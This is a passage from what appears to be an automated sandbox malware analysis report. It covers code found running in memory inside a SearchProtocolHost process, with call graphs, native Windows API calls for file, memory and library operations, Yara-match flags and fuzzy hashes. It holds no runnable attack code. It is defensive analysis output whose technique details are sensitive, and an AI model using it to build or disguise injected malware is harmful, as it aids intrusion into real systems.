2c23899 78634->78635 78658 2c23300 LdrLoadDll 78634->78658 78637 2c2bb40 RtlAllocateHeap 78635->78637 78641 2c23a47 78635->78641 78638 2c238b2 78637->78638 78639 2c23a3d 78638->78639 78638->78641 78643 2c238ce 78638->78643 78640 2c2ba60 RtlFreeHeap 78639->78640 78639->78641 78640->78641 78641->78608 78642 2c2ba60 RtlFreeHeap 78644 2c23a31 78642->78644 78643->78641 78643->78642 78644->78608 78646 2c1a696 78645->78646 78659 2c1e0a0 78646->78659 78648 2c1a708 78650 2c1a890 78648->78650 78652 2c1a726 78648->78652 78649 2c1a875 78649->78608 78650->78649 78651 2c1a530 RtlFreeHeap 78650->78651 78651->78650 78652->78649 78664 2c1a530 78652->78664 78655 2c1aa06 78654->78655 78656 2c1e0a0 RtlFreeHeap 78655->78656 78657 2c1aa8d 78656->78657 78657->78610 78658->78635 78661 2c1e0c4 78659->78661 78660 2c1e0d1 78660->78648 78661->78660 78662 2c2ba60 RtlFreeHeap 78661->78662 78663 2c1e114 78662->78663 78663->78648 78665 2c1a54d 78664->78665 78668 2c1e130 78665->78668 78667 2c1a653 78667->78652 78669 2c1e154 78668->78669 78670 2c1e1fe 78669->78670 78671 2c2ba60 RtlFreeHeap 78669->78671 78670->78667 78671->78670 78672 2c17320 78673 2c1734a 78672->78673 78676 2c184a0 78673->78676 78675 2c17374 78677 2c184bd 78676->78677 78683 2c29100 78677->78683 78679 2c1850d 78680 2c18514 78679->78680 78681 2c291e0 LdrInitializeThunk 78679->78681 78680->78675 78682 2c1853d 78681->78682 78682->78675 78684 2c29198 78683->78684 78685 2c29128 78683->78685 78688 33b2f30 LdrInitializeThunk 78684->78688 78685->78679 78686 2c291d1 78686->78679 78688->78686 78460 2c21c60 78461 2c21c7c 78460->78461 78462 2c21ca4 78461->78462 78463 2c21cb8 78461->78463 78464 2c299b0 NtClose 78462->78464 78465 2c299b0 NtClose 78463->78465 78466 2c21cad 78464->78466 78467 2c21cc1 78465->78467 78470 2c2bb80 RtlAllocateHeap 78467->78470 78469 2c21ccc 78470->78469 78471 2c2cb60 78472 2c2ba60 RtlFreeHeap 78471->78472 78473 2c2cb75 78472->78473 78689 2c20620 78690 2c2063d 78689->78690 78691 2c14ad0 LdrLoadDll 78690->78691 78692 2c2065b 78691->78692 78693 2c29820 78694 2c298c4 78693->78694 78696 2c29848 78693->78696 78695 2c298da NtReadFile 78694->78695 78479 2c12ce7 78480 2c12d28 78479->78480 78481 2c16850 2 API calls 78480->78481 78482 2c12d33 78481->78482 78697 33b2ad0 LdrInitializeThunk 78483 2c1a16f 78484 2c1a17f 78483->78484 78485 2c1a186 78484->78485 78486 2c2ba60 RtlFreeHeap 78484->78486 78486->78485 78698 2c12830 78699 2c12866 78698->78699 78700 2c29010 LdrInitializeThunk 78698->78700 78703 2c29a40 78699->78703 78700->78699 78702 2c1287b 78704 2c29a68 78703->78704 78705 2c29acc 78703->78705 78704->78702 78708 33b2e80 LdrInitializeThunk 78705->78708 78706 2c29afd 78706->78702 78708->78706 78709 2c11330 78710 2c1134a 78709->78710 78711 2c14ad0 LdrLoadDll 78710->78711 78712 2c11368 78711->78712 78713 2c113ad 78712->78713 78714 2c1139c PostThreadMessageW 78712->78714 78714->78713 78715 2c1cb30 78717 2c1cb59 78715->78717 78716 2c1cc5c 78717->78716 78718 2c1cbfe FindFirstFileW 78717->78718 78718->78716 78720 2c1cc19 78718->78720 78719 2c1cc43 FindNextFileW 78719->78720 78721 2c1cc55 FindClose 78719->78721 78720->78719 78721->78716 78487 2c21ff0 78490 2c22009 78487->78490 78488 2c22051 78489 2c2ba60 RtlFreeHeap 78488->78489 78491 2c22061 78489->78491 78490->78488 78492 2c22094 78490->78492 78494 2c22099 78490->78494 78493 2c2ba60 RtlFreeHeap 78492->78493 78493->78494

                                Executed Functions

                                Function 02C09EC0 Relevance: 32.9, Strings: 26, Instructions: 436COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 26 2c09ec0-2c0a200 27 2c0a20a-2c0a211 26->27 28 2c0a243-2c0a25b 27->28 29 2c0a213-2c0a241 27->29 30 2c0a26c-2c0a278 28->30 29->27 31 2c0a27a-2c0a28c 30->31 32 2c0a28e-2c0a2b2 30->32 31->30 34 2c0a2c3-2c0a2cf 32->34 35 2c0a2d1-2c0a2e0 34->35 36 2c0a2e2-2c0a2ef 34->36 35->34 36->36 38 2c0a2f1-2c0a2fa 36->38 39 2c0a300-2c0a30a 38->39 40 2c0a5c2-2c0a5cc 38->40 41 2c0a31b-2c0a327 39->41 42 2c0a5dd-2c0a5e9 40->42 43 2c0a329-2c0a33c 41->43 44 2c0a33e-2c0a348 41->44 45 2c0a5fb-2c0a605 42->45 46 2c0a5eb-2c0a5f1 42->46 43->41 52 2c0a359-2c0a365 44->52 49 2c0a607-2c0a626 45->49 50 2c0a639-2c0a63d 45->50 47 2c0a5f3-2c0a5f6 46->47 48 2c0a5f9 46->48 47->48 48->42 54 2c0a637 49->54 55 2c0a628-2c0a631 49->55 56 2c0a65e-2c0a665 50->56 57 2c0a63f-2c0a65c 50->57 58 2c0a367-2c0a379 52->58 59 2c0a37b-2c0a385 52->59 54->45 55->54 60 2c0a6d1-2c0a6d8 56->60 61 2c0a667-2c0a671 56->61 57->50 58->52 63 2c0a396-2c0a39f 59->63 64 2c0a6e3-2c0a6ea 60->64 65 2c0a682-2c0a68b 61->65 66 2c0a3a1-2c0a3ad 63->66 67 2c0a3bd-2c0a3c0 63->67 69 2c0a715-2c0a71f 64->69 70 2c0a6ec-2c0a713 64->70 71 2c0a6a1 call 2c2b6d0 65->71 72 2c0a68d-2c0a69f 65->72 73 2c0a3bb 66->73 74 2c0a3af-2c0a3b5 66->74 68 2c0a3c6-2c0a3ca 67->68 76 2c0a40b-2c0a415 68->76 77 2c0a3cc-2c0a3ed 68->77 79 2c0a730-2c0a73a 69->79 70->64 87 2c0a6a6-2c0a6ad 71->87 80 2c0a673-2c0a67c 72->80 73->63 74->73 84 2c0a426-2c0a432 76->84 82 2c0a3fb-2c0a409 77->82 83 2c0a3ef-2c0a3f8 77->83 85 2c0a774-2c0a77e 79->85 86 2c0a73c-2c0a772 79->86 80->65 82->68 83->82 89 2c0a434-2c0a446 84->89 90 2c0a448-2c0a452 84->90 92 2c0a78f-2c0a79b 85->92 86->79 87->60 88 2c0a6af-2c0a6cf 87->88 88->87 89->84 93 2c0a463-2c0a46d 90->93 95 2c0a79d-2c0a7ac 92->95 96 2c0a7ae-2c0a7b7 92->96 97 2c0a4a7-2c0a4b0 93->97 98 2c0a46f-2c0a4a5 93->98 95->92 100 2c0a4b2-2c0a4ca 97->100 101 2c0a4cc-2c0a4db 97->101 98->93 100->97 103 2c0a558-2c0a55c 101->103 104 2c0a4dd-2c0a4e7 101->104 106 2c0a585-2c0a58b 103->106 107 2c0a55e-2c0a583 103->107 105 2c0a4f8-2c0a502 104->105 108 2c0a504-2c0a554 105->108 109 2c0a556 105->109 110 2c0a58f-2c0a598 106->110 107->103 108->105 109->40 112 2c0a59a-2c0a5bb 110->112 113 2c0a5bd 110->113 112->110 113->38
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Y$!Y0=b^$&$,$0=b^$4"$9$9k$;1$;s$<$A$ED$M$W%no$X$`*$i$no$no$w$z$ $g$i$~
                                • API String ID: 0-1950466578
                                • Opcode ID: 2444ce7c013ccc3866e766800ecaafa545ac4ebde1a67ca04ab43f54ad9863bb
                                • Instruction ID: 0c9c3ae601062d0b5758deca0c91df7bb81b406ae043d2a6352a31d5cef05888
                                • Opcode Fuzzy Hash: 2444ce7c013ccc3866e766800ecaafa545ac4ebde1a67ca04ab43f54ad9863bb
                                • Instruction Fuzzy Hash: FC329BB0D05269CBEB24CF59C998BEDBBB2BB45308F1085D9C50E7B280C7B55A89CF51
                                Function 02C1CB30 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C1CC0F
                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C1CC4E
                                • FindClose.KERNELBASE(?), ref: 02C1CC59
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNext
                                • String ID:
                                • API String ID: 3541575487-0
                                • Opcode ID: d7e1d38b93dafd8dabd6d6de46cff0cb059a3ba5935130805c74bf067f894bd5
                                • Instruction ID: 98e77191db38faae17557eb9881a13fd4152c3cb6900569968d731b62f03c03e
                                • Opcode Fuzzy Hash: d7e1d38b93dafd8dabd6d6de46cff0cb059a3ba5935130805c74bf067f894bd5
                                • Instruction Fuzzy Hash: 72317271A40718BBDB20DF60CC85FEF77BD9B84704F144559BA08A7180DAB0AF859BA1
                                Function 02C296C0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtCreateFile.NTDLL(B54A54D0,?,?,?,?,?,00000037,?,?,?,?), ref: 02C297B8
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 7790a154dca7401fd1aa453f7d3794e88b438efa65bc9697a63e31856814e4b9
                                • Instruction ID: 6a01d853ada0d7a4c44b56351359666376b68cdc3fa89f223de56ac9155b8499
                                • Opcode Fuzzy Hash: 7790a154dca7401fd1aa453f7d3794e88b438efa65bc9697a63e31856814e4b9
                                • Instruction Fuzzy Hash: 5331D5B5A01248ABCB14DF98C880EEEB7B9EF8C300F108209F918A7340D734A941CFA5
                                Function 02C29820 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtReadFile.NTDLL(B54A54D0,?,?,?,?,?,00000037,?,?), ref: 02C29903
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1b697acd32260530dd58febba1ee2c97b8feef1ab5b6de207efa1882a8c9b81f
                                • Instruction ID: f2c325134b0b76e4c67edfcc35b4d53b58dfbe91f5258b5facd66deb3ee8131a
                                • Opcode Fuzzy Hash: 1b697acd32260530dd58febba1ee2c97b8feef1ab5b6de207efa1882a8c9b81f
                                • Instruction Fuzzy Hash: B531E6B5A00208ABDB14DF98C880EEFB7B9EF8C314F108609F918A7240D774A951CFA5
                                Function 02C29B10 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(B54A54D0,?,02C284BF,00000000,00000004,00003000,?,?,?,?,?,02C284BF,02C1231E), ref: 02C29BD2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: 96b72d362373cc5cc379d3f598795e46e598ffca6a52a36b71e949e57889418d
                                • Instruction ID: 326f5fa1eea5b1553ac61fd4735afe09c147e32c1027fc82eb97dae7354b79a7
                                • Opcode Fuzzy Hash: 96b72d362373cc5cc379d3f598795e46e598ffca6a52a36b71e949e57889418d
                                • Instruction Fuzzy Hash: 6F21F9B5A00218ABDB10DF98DC41EEFB7B9EF88700F108619F918A7240DB74A911CFA5
                                Function 02C29910 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtDeleteFile.NTDLL(B54A54D0), ref: 02C299A3
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: c2d1e30d9603c87b9e5c6bc25496436e0077ce67db9531472bcf6168351679f3
                                • Instruction ID: c50502ffcd435ce115c873a723ffd192492b17e29eadb4f7775770bfa0d279b9
                                • Opcode Fuzzy Hash: c2d1e30d9603c87b9e5c6bc25496436e0077ce67db9531472bcf6168351679f3
                                • Instruction Fuzzy Hash: F2117071640218BAD720EB68CC41FEBB3ADEF89714F10850DFA48A7280EBB56505CBB5
                                Function 02C299B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C299E4
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction ID: 356e4bb4abc22eacab8177ba48d439096f72f37f56fdd18716ef1c7731d8cac3
                                • Opcode Fuzzy Hash: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction Fuzzy Hash: 30E046362506147BD620AAAACC50FABB76DDBC5710F008415FA48AB292C671BA018AE0
                                Function 033B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 0cbd71d2c98069830d34a068e024db0dc14f02505c7f23f5047fede6c5eccd94
                                • Instruction ID: 992b49557739de907d34fe25967c2710de1ecdead819bce4529970177c071af7
                                • Opcode Fuzzy Hash: 0cbd71d2c98069830d34a068e024db0dc14f02505c7f23f5047fede6c5eccd94
                                • Instruction Fuzzy Hash: 01900239625844129140B15D48C4546500597E0301B55C015E0424954C8B158F565361
                                Function 033B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: d09e535855fc6e9a04bcb22d694b6652059569213d6409a03fd0ec1fa48df272
                                • Instruction ID: 15536465ff1f037a805f255016ac2cd7b8ab61aa7063c5afc9140527af41a381
                                • Opcode Fuzzy Hash: d09e535855fc6e9a04bcb22d694b6652059569213d6409a03fd0ec1fa48df272
                                • Instruction Fuzzy Hash: 0A900269621544424140B15D4844406700597E1301395C119A0554960C87198E559369
                                Function 033B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: bf4af7998d054c1d22a810a5424a4e2be5b741330ea61b9e2833716e7642b8cc
                                • Instruction ID: 640557aa78f122124cbb0fb59a75777d116c68520ad54ab0152383d0fcadcb11
                                • Opcode Fuzzy Hash: bf4af7998d054c1d22a810a5424a4e2be5b741330ea61b9e2833716e7642b8cc
                                • Instruction Fuzzy Hash: 0390023962554802D100B15D4554706200587D0201F65C415A0424968D87968F5166A2
                                Function 033B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4c6d21efb59d480643fb89396c17a528c107583a32bf3e34f18eb232ec3e0650
                                • Instruction ID: 8500ee71f3878323746e1f9b59349b3d93d20a1b0403254fd9c3dcc0c971e800
                                • Opcode Fuzzy Hash: 4c6d21efb59d480643fb89396c17a528c107583a32bf3e34f18eb232ec3e0650
                                • Instruction Fuzzy Hash: 65900269222444034105B15D4454616500A87E0201B55C025E1014990DC6268E916225
                                Function 033B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9c1191a4e442ce47ca45ff237302695751a13912148982f6613f9e6874359574
                                • Instruction ID: 739773340ccb9c58e30b28d0becf47c51be3a51a7d3a628e2f361867a00eb91e
                                • Opcode Fuzzy Hash: 9c1191a4e442ce47ca45ff237302695751a13912148982f6613f9e6874359574
                                • Instruction Fuzzy Hash: 0B90023962544C02D150B15D4454746100587D0301F55C015A0024A54D87568F5577A1
                                Function 033B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c1bc4994d76cacce4a2e80d4cb0b214114c32de7de30b11036d85b9890b06b56
                                • Instruction ID: 669124ad71a3f3540e94970349437a72a59f1ab6a374c9a2f4455eac43c766dd
                                • Opcode Fuzzy Hash: c1bc4994d76cacce4a2e80d4cb0b214114c32de7de30b11036d85b9890b06b56
                                • Instruction Fuzzy Hash: 9490023922144C02D180B15D444464A100587D1301F95C019A0025A54DCB168F5977A1
                                Function 033B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a13dee50a5977953d836ad736fc8413cd6f6e99715d506c6f530c68b18b194b2
                                • Instruction ID: 80f6738efd9a63757622684be0e45b598090fdf1f79c00cbdbd50c65a56d3611
                                • Opcode Fuzzy Hash: a13dee50a5977953d836ad736fc8413cd6f6e99715d506c6f530c68b18b194b2
                                • Instruction Fuzzy Hash: 3190023922548C42D140B15D4444A46101587D0305F55C015A0064A94D97268F55B761
                                Function 033B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 803595604808e9ec9a30c08ff72df1605044bdee6693a41f1b0045c4f9c3ae76
                                • Instruction ID: cd3e1940a05b2dd9de851ec67f171b402d00f991f0849d31671af9b5f7cc7155
                                • Opcode Fuzzy Hash: 803595604808e9ec9a30c08ff72df1605044bdee6693a41f1b0045c4f9c3ae76
                                • Instruction Fuzzy Hash: DC90022D231444020145F55D064450B144597D6351395C019F1416990CC7228E655321
                                Function 033B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 7c4404c1cbd7517f23e364bde7b406a5b2dc085e7c800fc76981c9073aa2beea
                                • Instruction ID: ef701cd5b33d0d314383f829de58f65e6907fbb3fc33a295cc4073f9c2f94b61
                                • Opcode Fuzzy Hash: 7c4404c1cbd7517f23e364bde7b406a5b2dc085e7c800fc76981c9073aa2beea
                                • Instruction Fuzzy Hash: 4290043D331444030105F55D07445071047C7D5351355C035F1015D50CD733CF715331
                                Function 033B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9af48b36103d21e845f4c29b269b11fb7eb20a68f90cf1c434a007cfd2da36ac
                                • Instruction ID: b9f590be759a97992bf048f6f9765a8d5a7fcd26eb2aa8badb250f46d4ea6ed3
                                • Opcode Fuzzy Hash: 9af48b36103d21e845f4c29b269b11fb7eb20a68f90cf1c434a007cfd2da36ac
                                • Instruction Fuzzy Hash: 3F90022926549502D150B15D44446165005A7E0201F55C025A0814994D86568E556321
                                Function 033B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 0183b2f4f9e2a87479a72fe497e029b0974332c662459b55fcf69443dcea6046
                                • Instruction ID: 4fe7daec1554873d0adbd62820ebf9dc0bd0cf7dc369bc7ec4e86a8ca2b20bca
                                • Opcode Fuzzy Hash: 0183b2f4f9e2a87479a72fe497e029b0974332c662459b55fcf69443dcea6046
                                • Instruction Fuzzy Hash: 1290026936144842D100B15D4454B061005C7E1301F55C019E1064954D871ACE526226
                                Function 033B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6d544d5d7a9cd294537a6313f6ac1076f5c8e915816febe43af71a5348bb0bca
                                • Instruction ID: 87c4affae4327e0d933a36120c06ce9ba278667ceed15e0888d29fdf8282e732
                                • Opcode Fuzzy Hash: 6d544d5d7a9cd294537a6313f6ac1076f5c8e915816febe43af71a5348bb0bca
                                • Instruction Fuzzy Hash: 2E900229621444424140B16D88849065005ABE1211755C125A0998950D865A8E655765
                                Function 033B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
